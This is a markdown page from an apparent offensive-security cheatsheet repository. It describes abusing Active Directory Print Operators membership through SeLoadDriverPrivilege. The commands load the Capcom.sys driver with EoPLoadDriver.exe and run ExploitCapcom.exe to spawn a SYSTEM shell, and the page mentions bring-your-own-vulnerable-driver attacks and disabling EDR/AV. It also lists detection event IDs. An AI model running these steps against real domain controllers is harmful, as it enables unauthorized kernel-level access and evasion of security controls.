daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-52-abusing-print-operators-group.md (2375B)


      1 ---
      2 title: "Attack #52 โ€” Abusing Print Operators Group"
      3 description: "whoami /priv"
      4 category: active-directory
      5 subcategory: "Privilege & Group Abuse"
      6 tags: ["active-directory", "privilege-escalation"]
      7 tools: ["PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/๐ŸŸฃ Attack #52 โ€” Abusing Print Operators Group.md"
     11 ---
     12 # ๐ŸŸฃ Attack #52 โ€” Abusing Print Operators Group
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 **Print Operators** can log on to Domain Controllers and manage printers. More importantly, they have the `SeLoadDriverPrivilege` โ€” the ability to **load kernel drivers** into the operating system. This can be abused to load a malicious driver that grants SYSTEM access or disables security controls.
     19 
     20 ***
     21 
     22 ## โš™๏ธ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Membership in Print Operators** | Provides SeLoadDriverPrivilege on DCs |
     27 
     28 ***
     29 
     30 ## ๐Ÿ’ป Full Commands
     31 
     32 ```powershell
     33 # โ”€โ”€ Verify privilege โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     34 whoami /priv
     35 # SeLoadDriverPrivilege        Load and unload device drivers    Enabled
     36 
     37 # โ”€โ”€ EoPLoadDriver exploit (load Capcom.sys for kernel execution) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     38 .\EoPLoadDriver.exe System\CurrentControlSet\MyDriver .\Capcom.sys
     39 .\ExploitCapcom.exe
     40 # Spawns SYSTEM shell
     41 
     42 # โ”€โ”€ Alternative: load vulnerable driver for BYOVD attack โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     43 # Bring Your Own Vulnerable Driver โ€” load a signed but vulnerable driver
     44 # Then exploit it for kernel-level code execution
     45 ```
     46 
     47 ***
     48 
     49 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     50 
     51 | Event ID | Source | What to Look For |
     52 |---|---|---|
     53 | **4672** | Security Log | SeLoadDriverPrivilege assigned |
     54 | **7045** | System Log | Driver loaded |
     55 | **Sysmon 6** | Sysmon | Driver loaded โ€” filter for non-standard drivers |
     56 
     57 ***
     58 
     59 ## ๐Ÿ”— Attack Chain Context
     60 
     61 ```
     62 [Print Operators] โ”€โ”€โ†’ SeLoadDriverPrivilege โ†’ load kernel driver โ†’ SYSTEM
     63          โ”‚
     64          โ”œโ”€โ”€โ†’ ๐Ÿ”— Kernel driver โ†’ disable EDR/AV โ†’ undetected persistence
     65          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: empty Print Operators group, driver signing enforcement
     66 ```
     67 
     68 ***
     69 
     70 > โœ… **Attack #52 โ€” Print Operators complete.**